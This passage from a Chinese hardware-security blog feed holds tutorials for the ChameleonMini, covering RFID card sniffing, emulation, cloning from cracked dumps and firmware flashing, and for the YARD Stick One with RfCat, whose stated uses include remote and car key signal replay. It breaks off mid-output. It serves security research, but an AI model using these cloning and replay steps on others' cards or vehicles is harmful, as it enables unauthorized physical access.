class="line"><span class="built_in">cd</span> ChameleonMini/Software/</span><br><span class="line">pip install -r requirements.txt</span><br></pre></td></tr></table></figure><p>使用</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">$ ./chamtool.py -h</span><br><span class="line">usage: chamtool.py [-h] [-v] [-p COMPORT] [-u DUMPFILE] [-d DUMPFILE]</span><br><span class="line"> [-l LOGFILE] [-i] [-s [{1,2,3,4,5,6,7,8}]] [-U [UID]]</span><br><span class="line"> [-c [CFGNAME]] [-lb [ACTION]] [-rb [ACTION]]</span><br><span class="line"> [-gl [FUNCTION]] [-rl [FUNCTION]]</span><br><span class="line"></span><br><span class="line">Controls the Chameleon through the <span class="built_in">command</span> line</span><br><span class="line"></span><br><span class="line">optional arguments:</span><br><span class="line"> -h, --<span class="built_in">help</span> show this <span class="built_in">help</span> message and <span class="built_in">exit</span></span><br><span class="line"> -v, --verbose output verbose</span><br><span class="line"> -p COMPORT, --port COMPORT</span><br><span class="line"> specify device<span class="string">'s comport</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Chameleon commands:</span></span><br><span class="line"><span class="string"> These arguments can appear multiple times and are executed in the order</span></span><br><span class="line"><span class="string"> they are given on the command line. Some of these arguments can be used</span></span><br><span class="line"><span class="string"> with '</span>?<span class="string">' as parameter to get a list of suggestions.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> -u DUMPFILE, --upload DUMPFILE</span></span><br><span class="line"><span class="string"> upload a card dump</span></span><br><span class="line"><span class="string"> -d DUMPFILE, --download DUMPFILE</span></span><br><span class="line"><span class="string"> download a card dump</span></span><br><span class="line"><span class="string"> -l LOGFILE, --log LOGFILE</span></span><br><span class="line"><span class="string"> download the device log</span></span><br><span class="line"><span class="string"> -i, --info retrieve the version information</span></span><br><span class="line"><span class="string"> -s [{1,2,3,4,5,6,7,8}], --setting [{1,2,3,4,5,6,7,8}]</span></span><br><span class="line"><span class="string"> retrieve or set the current setting</span></span><br><span class="line"><span class="string"> -U [UID], --uid [UID]</span></span><br><span class="line"><span class="string"> retrieve or set the current UID</span></span><br><span class="line"><span class="string"> -c [CFGNAME], --config [CFGNAME]</span></span><br><span class="line"><span class="string"> retrieve or set the current configuration</span></span><br><span class="line"><span class="string"> -lb [ACTION], --lbutton [ACTION]</span></span><br><span class="line"><span class="string"> retrieve or set the current left button action</span></span><br><span class="line"><span class="string"> -rb [ACTION], --rbutton [ACTION]</span></span><br><span class="line"><span class="string"> retrieve or set the current right button action</span></span><br><span class="line"><span class="string"> -gl [FUNCTION], --gled [FUNCTION]</span></span><br><span class="line"><span class="string"> retrieve or set the current green led function</span></span><br><span class="line"><span class="string"> -rl [FUNCTION], --rled [FUNCTION]</span></span><br><span class="line"><span class="string"> retrieve or set the current red led function</span></span><br></pre></td></tr></table></figure><h3 id="读取-RFID-卡"><a href="#读取-RFID-卡" class="headerlink" title="读取 RFID 卡"></a>读取 RFID 卡</h3><p>打开终端输入命令</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">CONFIG=ISO14443A READER // 你输入的命令</span><br><span class="line">_G@ISO14443A READER_100:OK // 设备返回的确认信息</span><br><span class="line"></span><br><span class="line">IDENTIFY // 你输入的命令</span><br><span class="line">101:OK WITH TEXT // 设备返回的确认信息</span><br><span class="line">MIFARE Cڱ__ 1▒ .A.▒s.A@.▒t▒6u/=<span class="variable">$A</span> // 设备返回的数据信息(下同)</span><br><span class="line">ATQA: 0400</span><br><span class="line">UID: ABCD1234</span><br><span class="line">SAK: 08</span><br></pre></td></tr></table></figure><h3 id="嗅探-RFID-卡"><a href="#嗅探-RFID-卡" class="headerlink" title="嗅探 RFID 卡"></a>嗅探 RFID 卡</h3><p>进行嗅探 RFID 卡你还需要有一个 ACR122U 读卡器和一张符合 ISO14443A 的被嗅探 RFID 卡。</p><p>首先将 ACR122U 和 ChameleonMini 连接到电脑,再将 ChameleonMini 放置于 ACR122U 上,被嗅探的卡放在与 ChameleonMini 上。</p><p>在终端程序上输入命令</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">LOGMODE=TERMINAL // 你输入的命令</span><br><span class="line">100:OKE=TERMINAL // 设备返回的确认信息</span><br></pre></td></tr></table></figure><p>开始嗅探</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">CONFIG=ISO14443A_SNIFF // 你输入的命令</span><br><span class="line">100:OK=ISO14443A_SNIFF // 设备返回的确认信息</span><br><span class="line">...</span><br><span class="line">... // 返回类似乱码的嗅探信息(此处省略)</span><br><span class="line">...</span><br></pre></td></tr></table></figure><p><img src="//files.iternull.com/images/2017-05-22_01-0001.png" alt=""></p><p>停止嗅探</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">CONFIG=NONE</span><br></pre></td></tr></table></figure><p>使用 ChamTool.py 工具嗅探</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./chamtool.py -v -p /dev/ttyACM0 -c ISO14443A_SNIFF</span><br></pre></td></tr></table></figure><h3 id="模拟-RFID-卡"><a href="#模拟-RFID-卡" class="headerlink" title="模拟 RFID 卡"></a>模拟 RFID 卡</h3><p>使用 ChameleonMini 模拟另一张 RFID 卡,需要你先获得那张卡的完整扇区数据再将数据上传到 ChameleonMini 硬件存储内开始模拟,文件格式为 <code>.mfd</code> 的十六进制文件。<br>获取原始 RFID 的完整扇区数据你可以使用 Proxmark3 或者 ACR122U or PN532 + mfoc 破解获得 RFID 卡所有扇区的 Key 并 Dump 所有扇区的数据。<br>Dump 下来的数据可能会是 ASCII 的存文本格式或者是与卡内格式一样的十六进制,ChameleonMini 只支持导入十六进制格式的,如果是其他格式数据你先需要将它转换为十六进制的文件。<br>Proxmark3 客户端内自带转换工具 <code>pm3_eml2mfd.py</code> ,你也可以手动使用 <code>HxD Hex Editor</code>, <code>WinHex</code> 等 十六进制编辑器创建编辑一张卡的数据。<br>当有了 Dump 文件后你可以使用 SecureCRT 或其他终端连接到 ChameleonMini 串口把文件上传上去。<br>在终端输入 <code>UPLOAD</code> 命令,打开 传输 > 发送 Xmodem > 找到你要上传的文件。<br>上传完成后再在终端设置你的卡片类型,如:<code>CONFIG=MF_CLASSIC_1K</code> 设置卡片为 Mifare Classic 1K 卡</p><p>使用 ChamTool.py 工具上传卡数据文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./chamtool.py -p /dev/ttyACM0 -u card.mfd</span><br></pre></td></tr></table></figure><h3 id="模拟多张-RFID-卡"><a href="#模拟多张-RFID-卡" class="headerlink" title="模拟多张 RFID 卡"></a>模拟多张 RFID 卡</h3><p>模拟多张卡需要用到 ChameleonMini 的按钮功能用以切换不同的卡片,并可把不同的卡片数据上传上去,按钮功能是可自定义配置,最多支持 8 张卡的存储和切换。</p><p>在终端输入 <code>button</code> 命令</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">button // 查看按钮的配置选项</span><br><span class="line">101:OK WITH TEXT</span><br><span class="line">NONE,UID_RANDOM,UID_LEFT_INCREMENT,UID_RIGHT_INCREMENT,UID_LEFT_DECREMENT,UID_RIGHT_DECREMENT,CYCLE_SETTINGS,STORE_MEM,RECALL_MEM</span><br></pre></td></tr></table></figure><p>配置按钮功能为切换卡片</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">button=CYCLE_SETTINGS // 开启按钮的卡片切换功能</span><br><span class="line">100:OK</span><br><span class="line">setting? // 查看当前的卡片编号</span><br><span class="line">101:OK WITH TEXT</span><br><span class="line">1</span><br><span class="line">config? // 查看当前卡片类型的配置信息</span><br><span class="line">101:OK WITH TEXT</span><br><span class="line">MF_CLASSIC_1K</span><br><span class="line">uid? // 查看当前的 UID</span><br><span class="line">101:OK WITH TEXT</span><br><span class="line">ABCD1234</span><br><span class="line">setting=2 // 设置卡片编号</span><br><span class="line">100:OK</span><br><span class="line">setting? // 查看当前的卡片编号</span><br><span class="line">101:OK WITH TEXT</span><br><span class="line">2</span><br><span class="line">config=MF_ULTRALIGHT // 设置卡片类型</span><br><span class="line">100:OK</span><br><span class="line">config? // 查看当前卡片类型的配置信息</span><br><span class="line">101:OK WITH TEXT</span><br><span class="line">MF_ULTRALIGHT</span><br><span class="line">uid=AABBCCDDEEFF11 // 设置 UID</span><br><span class="line">100:OK</span><br><span class="line">uid? // 查看当前的 UID</span><br><span class="line">101:OK WITH TEXT</span><br><span class="line">AABBCCDDEEFF11</span><br></pre></td></tr></table></figure><p>按钮的功能配置和说明</p><table><thead><tr><th style="text-align:left">按钮配置</th><th style="text-align:left">功能说明</th></tr></thead><tbody><tr><td style="text-align:left">NONE</td><td style="text-align:left">什么都不做</td></tr><tr><td style="text-align:left">UID_RANDOM</td><td style="text-align:left">生成随机 UID</td></tr><tr><td style="text-align:left">UID_LEFT_INCREMENT</td><td style="text-align:left">将 UID 的最左十六进制值增加 1</td></tr><tr><td style="text-align:left">UID_RIGHT_INCREMENT</td><td style="text-align:left">将 UID 的最右边的十六进制值增加 1</td></tr><tr><td style="text-align:left">UID_LEFT_DECREMENT</td><td style="text-align:left">将 UID 的最左边十六进制值减少 1</td></tr><tr><td style="text-align:left">UID_RIGHT_DECREMENT</td><td style="text-align:left">将 UID 的最右边的十六进制值减少 1</td></tr><tr><td style="text-align:left">CYCLE_SETTINGS</td><td style="text-align:left">允许按钮在多张卡之间切换</td></tr><tr><td style="text-align:left">STORE_MEM</td><td style="text-align:left">存储内存</td></tr><tr><td style="text-align:left">RECALL_MEM</td><td style="text-align:left">记忆输出(还原存储的内存)</td></tr></tbody></table><h3 id="烧录固件"><a href="#烧录固件" class="headerlink" title="烧录固件"></a>烧录固件</h3><p>ChameleonMini 的 MCU 使用的是 Atmel 的 AVR ATxmega 系列的处理器,烧录固件的方法与烧录其他 AVR 单片机固件的方法一样。<br>可以使用 AVRISP mkII, USBasp 等编程硬件工具加上 Atmel Studio, AVRDUDE 等编程软件客户端,烧录 Bootloader 和固件。<br>接线针脚,Chameleon-Mini 底部一排未焊接的焊盘是标准的 ATxmega 编程引脚,以有贴片元件的一面为正面,正面 3 个引脚分别是 <code>VCC</code>, <code>NC</code>, <code>GND</code> 正对的背面 3 个分别是 <code>PDI_DATA</code>, <code>NC</code>, <code>PDI_CLK/RST</code> 。</p><p><img src="//files.iternull.com/images/2017-05-22_01-0002.jpg" alt=""></p><h3 id="升级固件"><a href="#升级固件" class="headerlink" title="升级固件"></a>升级固件</h3><p>Chameleon Mini 使用了 USB DFU Bootloader,可直接使用 USB 连接硬件升级固件。(只有烧录了 Bootloader 的才支持,自己制作的裸板需要先烧录 Bootloader。)</p><p>Linux 用户升级固件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">apt-get install avra avrdude</span><br><span class="line">avrdude -c flip2 -p ATXMega128A4U -B 60 -P usb -U application:w:Chameleon-Mini.hex:i -U eeprom:w:Chameleon-Mini.eep:i</span><br></pre></td></tr></table></figure><p>Windows 用户升级固件</p><ol><li>下载 <a href="https://sourceforge.net/projects/dfu-programmer/files/dfu-programmer/0.7.2/dfu-programmer-win-0.7.2.zip/download" target="_blank" rel="noopener">dfu-programmer 0.7.2</a></li><li>解压到目录,然后打开文件夹 dfu-prog-usb-1.2.2 ,安装 <code>atmel_usb_dfu.inf</code> 驱动程序。(右键单击 > 安装)</li><li>将 dfu-programmer.exe 复制到 hex 和 eep 文件的同一目录里。</li><li>将 ChameleonFirmwareUpgrade.bat 复制在与 hex 和 eep 文件相同的目录里。</li><li>以管理员身份运行 ChameleonFirmwareUpgrade.bat 等待固件升级终止。(成功后 ChameleonMini 的绿色 LED 应该亮起来)</li></ol><hr><h3 id="链接"><a href="#链接" class="headerlink" title="链接"></a>链接</h3><ul><li><a href="https://github.com/emsec/ChameleonMini/wiki" target="_blank" rel="noopener">ChameleonMini Wiki</a></li><li><a href="https://rawgit.com/emsec/ChameleonMini/master/Doc/Doxygen/html/index.html" target="_blank" rel="noopener">Chameleon-Mini Documentation</a></li><li><a href="https://www.kickstarter.com/projects/1980078555/chameleonmini-a-versatile-nfc-card-emulator-and-mo" target="_blank" rel="noopener">Kickstarter - ChameleonMini</a></li><li><a href="https://store.ryscc.com/products/chameleonmini" target="_blank" rel="noopener">ChameleonMini - Rysc Corp</a></li><li><a href="https://store.ryscc.com/blogs/news/54097857-getting-started-with-the-chameleonmini" target="_blank" rel="noopener">Getting Started with the ChameleonMini RevE-2</a></li><li><a href="https://store.ryscc.com/blogs/news/34542273-unleash-the-chameleons" target="_blank" rel="noopener">Unleash the Chameleons!</a></li><li><a href="https://store.ryscc.com/blogs/news/86357121-installing-driver-for-chameleonmini-on-windows-7" target="_blank" rel="noopener">Installing Driver for ChameleonMini on Windows 7</a></li><li><a href="https://store.ryscc.com/blogs/news/77102465-sniffing-tags-with-the-chameleonmini" target="_blank" rel="noopener">Sniffing Tags with the ChameleonMini</a></li><li><a href="https://store.ryscc.com/blogs/news/39859649-emulating-mifare-4k-tags-with-the-chameleonmini" target="_blank" rel="noopener">Emulating Mifare 4K Tags with the ChameleonMini RevE-2</a></li><li><a href="https://store.ryscc.com/blogs/news/37733761-how-to-emulate-multiple-smart-cards-at-once-using-the-chameleonmini" target="_blank" rel="noopener">How to Emulate Multiple Smart Cards at once using the ChameleonMini</a></li></ul>]]></content>
<summary type="html">
<p><a href="https://github.com/emsec/ChameleonMini" target="_blank" rel="noopener">ChameleonMini</a> 是一款可编程的 NFC 安全分析工具的开源硬件项目,可以用于嗅探、模拟和克隆非接触式智能卡 (RFID Card)。<br>ChameleonMini 常见的有两个版本 <strong>ChameleonMini Rev.E</strong> 与 <strong>ChameleonMini Rev.G</strong> 其中 Rev.G 是最新升级的版本,自带电池供电。</p>
</summary>
<category term="Hardware" scheme="https://blog.iternull.com/tags/Hardware/"/>
<category term="RFID" scheme="https://blog.iternull.com/tags/RFID/"/>
<category term="ChameleonMini" scheme="https://blog.iternull.com/tags/ChameleonMini/"/>
</entry>
<entry>
<title>YARD Stick One 使用教程</title>
<link href="https://blog.iternull.com/posts/2017/05/17/YARD-Stick-One-Tutorial.html"/>
<id>https://blog.iternull.com/posts/2017/05/17/YARD-Stick-One-Tutorial.html</id>
<published>2017-05-17T15:27:28.000Z</published>
<updated>2017-06-01T14:16:54.759Z</updated>
<content type="html"><![CDATA[<p><a href="https://greatscottgadgets.com/yardstickone/" target="_blank" rel="noopener">YARD Stick One</a> 是一款 1 GHz 以下的 USB 无线收发器设备,基于 TI 的 <a href="http://www.ti.com/product/CC1110-CC1111" target="_blank" rel="noopener">CC1111</a> 芯片。你可以将 YARD Stick One 用于进行各种遥控信号的重放,汽车遥控锁的安全研究等。</p><a id="more"></a><ul><li>半双工发送和接收</li><li>工作频率-官方:300 - 348 MHz, 391 - 464 MHz 和 782 - 928 MHz</li><li>工作频率-非官方:281 - 361 MHz, 378 - 481 MHz 和 749 - 962 MHz</li><li>信号调制:ASK, OOK, GFSK, 2-FSK, 4-FSK, MSK</li><li>传输速率:500 kbps</li><li>全速 USB 2.0</li><li>SMA 母头天线连接器(50欧姆)</li><li>软件控制的天线端口功率(3.3 V 时最大为 50 mA)</li><li>低通滤波器,用于在 800 和 900 MHz 频带中工作时消除谐波</li><li>GoodFET 兼容的扩展和编程接口</li><li>GIMME 兼容编程测试点</li><li>开源硬件</li></ul><p>官方的工作频率是德州仪器 (TI) CC1111 芯片所支持的频率。但实际测试发现非官方的范围是可靠的,使用依旧正常。</p><ul><li>注:YARD Stick One 并不支持在 Windows 上使用,虽然有第三方尝试更改固件去支持 Windows 10 的 Linux 子系统,但目前官方并没宣布支持 Windows 系统。</li></ul><h2 id="1-使用"><a href="#1-使用" class="headerlink" title="1. 使用"></a>1. 使用</h2><p>YARD State One 并不与任何通用的 SDR 软件相兼容,你只能使用他指定的客户端 <a href="https://bitbucket.org/atlas0fd00m/rfcat" target="_blank" rel="noopener">RfCat</a>。</p><h3 id="1-1-安装-RfCat"><a href="#1-1-安装-RfCat" class="headerlink" title="1.1 安装 RfCat"></a>1.1 安装 RfCat</h3><p>从源码安装</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">apt-get install python-usb</span><br><span class="line">wget https://bitbucket.org/atlas0fd00m/rfcat/downloads/rfcat_170508.tgz</span><br><span class="line">tar xvzf rfcat_170508.tgz</span><br><span class="line"><span class="built_in">cd</span> rfcat_170508/</span><br><span class="line">python setup.py install</span><br></pre></td></tr></table></figure><p>Kali Linux</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get install rfcat</span><br></pre></td></tr></table></figure><h3 id="1-2-RfCat-帮助"><a href="#1-2-RfCat-帮助" class="headerlink" title="1.2 RfCat 帮助"></a>1.2 RfCat 帮助</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rfcat -h</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">usage: rfcat [-h] [-r] [-i INDEX] [-s] [-f BASEFREQ] [-c INC] [-n SPECCHANS]</span><br><span class="line"> [--bootloader] [--force]</span><br><span class="line"></span><br><span class="line">optional arguments:</span><br><span class="line"> -h, --help show this help message and exit</span><br><span class="line"> -r, --research Interactive Python and the "d" instance to talk to</span><br><span class="line"> your dongle. melikey longtime.</span><br><span class="line"> -i INDEX, --index INDEX</span><br><span class="line"> -s, --specan start spectrum analyzer</span><br><span class="line"> -f BASEFREQ, --basefreq BASEFREQ</span><br><span class="line"> -c INC, --inc INC</span><br><span class="line"> -n SPECCHANS, --specchans SPECCHANS</span><br><span class="line"> --bootloader trigger the bootloader (use in order to flash the</span><br><span class="line"> dongle)</span><br><span class="line"> --force use this to make sure you want to set bootloader mode</span><br><span class="line"> (you *must* flash after setting --bootloader)</span><br></pre></td></tr></table></figure><h3 id="1-3-频谱分析"><a href="#1-3-频谱分析" class="headerlink" title="1.3 频谱分析"></a>1.3 频谱分析</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rfcat -s -f 433e6</span><br></pre></td></tr></table></figure><p><img src="//files.iternull.com/images/2017-05-17_01-0002.png" alt=""></p><h3 id="1-4-RfCat-命令行"><a href="#1-4-RfCat-命令行" class="headerlink" title="1.4 RfCat 命令行"></a>1.4 RfCat 命令行</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rfcat -r</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">'RfCat, the greatest thing since Frequency Hopping!'</span></span><br><span class="line"></span><br><span class="line">Research Mode: enjoy the raw power of rflib</span><br><span class="line"></span><br><span class="line">currently your environment has an object called <span class="string">"d"</span> <span class="keyword">for</span> dongle. this is how</span><br><span class="line">you interact with the rfcat dongle:</span><br><span class="line"> >>> d.ping() // </span><br><span class="line"> >>> d.setFreq(433000000) // 设置信号频段</span><br><span class="line"> >>> d.setMdmModulation(MOD_ASK_OOK) // 设置信号调制模式</span><br><span class="line"> >>> d.makePktFLEN(250) // </span><br><span class="line"> >>> d.RFxmit(<span class="string">"HALLO"</span>) // 发送数据</span><br><span class="line"> >>> d.RFrecv() // 接收数据</span><br><span class="line"> >>> <span class="built_in">print</span> d.reprRadioConfig() // 打印配置选项</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">In [1]: <span class="built_in">print</span> d.reprRadioConfig() // 打印配置选项</span><br><span class="line">== Hardware ==</span><br><span class="line">Dongle: YARDSTICKONE</span><br><span class="line">Firmware rev: 0348</span><br><span class="line">Compiler: Not found! Update needed!</span><br><span class="line">Bootloader: CC-Bootloader</span><br><span class="line"></span><br><span class="line">== Software ==</span><br><span class="line">rflib rev: 450</span><br><span class="line"></span><br><span class="line">== Frequency Configuration ==</span><br><span class="line">Frequency: 901999877.929688 hz (0x259555L)</span><br><span class="line">Channel: 0</span><br><span class="line">Intermediate freq: 281250 hz</span><br><span class="line">Frequency Offset: 0 +/-</span><br><span class="line">Est. Freq Offset: 241</span><br><span class="line"></span><br><span class="line">== Modem Configuration ==</span><br><span class="line">Modulation: 2FSK</span><br><span class="line">DRate: 38360.595703 hz</span><br><span class="line">ChanBW: 93750.000000 hz</span><br><span class="line">DEVIATION: 20507.812500 hz</span><br><span class="line">Sync Mode: 15 of 16 bits must match</span><br><span class="line">Min TX Preamble: 4 bytes</span><br><span class="line">Chan Spacing: 199951.171875 hz</span><br><span class="line">BSLimit: No data rate offset compensation performed</span><br><span class="line">DC Filter: enabled</span><br><span class="line">Manchester Encoding: disabled</span><br><span class="line">Fwd Err Correct: disabled</span><br><span class="line"></span><br><span class="line">== Packet Configuration ==</span><br><span class="line">Sync Word: 0x0C4E</span><br><span class="line">Packet Length: 255</span><br><span class="line">Length Config: Fixed Packet Mode</span><br><span class="line">Configured Address: 0x0</span><br><span class="line">Preamble Quality Threshold: 4 * 2</span><br><span class="line">Append Status: No</span><br><span class="line">Rcvd Packet Check: No address check</span><br><span class="line">Data Whitening: off</span><br><span class="line">Packet Format: Normal mode</span><br><span class="line">CRC: disabled</span><br><span class="line"></span><br><span class="line">== AES Crypto Configuration ==</span><br><span class="line">AES Mode: CBC - Cipher Block Chaining</span><br><span class="line">Crypt RF Input: off</span><br><span class="line">Crypt RF Output: off</span><br><span class="line"></span><br><span class="line">== Radio Test Signal Configuration ==</span><br><span class="line">TEST2: 0x88</span><br><span class="line">TEST1: 0x31</span><br><span class="line">TEST0: 0x9</span><br><span class="line">VCO_SEL_CAL_EN: 0x0</span><br><span class="line"></span><br><span class="line">== Radio State ==</span><br><span class="line"> MARCSTATE: MARC_STATE_RX (d)</span><br><span class="line"> DONGLE RESPONDING: mode :c, last error<span class="comment"># 1</span></span><br><span class="line"></span><br><span class="line">== Client State ==</span><br><span class="line">========================================================================================================================</span><br><span class="line"> client thread cycles: 99/14</span><br><span class="line"> client errored cycles: 0</span><br><span class="line"> recv_queue: (0 bytes) <span class="string">''</span></span><br><span class="line"> trash: (3 blobs) <span class="string">"[128, 142, (1495128220.831341, '')]"</span></span><br><span class="line"> recv_mbox (2 keys) <span class="string">"['0x42', '0xff']"</span></span><br><span class="line"> app 0x42 (1 records)</span><br><span class="line"> [0x7] (0 frames) <span class="string">"[]"</span></span><br><span class="line"></span><br><span class="line"> app 0xff (4 records)</span><br><span class="line"> [0x88] (0 frames) <span class="string">"[]"</span></span><br><span class="line"> [0x80] (0 frames) <span class="string">"[]"</span></span><br><span class="line"> [0x82] (0 frames) <span class="string">"[]"</span></span><br><span class="line"> [0x86] (0 frames) <span class="string">"[]"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">In [2]: d.ping()</span><br><span class="line">PING: 26 bytes transmitted, received: <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span> (0.003433 seconds)</span><br><span class="line">PING: 26 bytes transmitted, received: <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span> (0.003278 seconds)</span><br><span class="line">PING: 26 bytes transmitted, received: <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span> (0.003287 seconds)</span><br><span class="line">PING: 26 bytes transmitted, received: <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span> (0.003417 seconds)</span><br><span class="line">PING: 26 bytes transmitted, received: <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span> (0.003243 seconds)</span><br><span class="line">PING: 26 bytes transmitted, received: <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span> 